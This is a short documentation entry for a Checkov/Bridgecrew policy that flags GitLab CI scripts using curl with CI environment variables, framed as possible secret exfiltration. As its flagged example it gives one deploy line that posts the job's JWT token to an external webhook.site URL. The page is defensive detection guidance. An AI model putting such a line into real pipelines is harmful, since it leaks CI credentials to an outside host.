Suspicious use of curl with CI environment variables in script
Error: Suspicious use of curl in a GitLab CI environment
Bridgecrew Policy ID: BC_REPO_GITLAB_CI_1
Checkov Check ID: CKV_GITLABCI_1
Ensure that there are no suspicious uses of curl with CI environment variables in script
Using curl with environment variables could be an attempt to exfiltrate secrets from a pipeline. Investigate if the use of curl is appropriate and secure.
Block code and remove code that attempts to exfiltrate secrets.
deploy: - script: 'curl -H \"Content-Type: application/json\" -X POST --data "$CI_JOB_JWT_V1" https://webhook.site/4cf17d70-56ee-4b84-9823-e86461d2f826'
Updated 4 months ago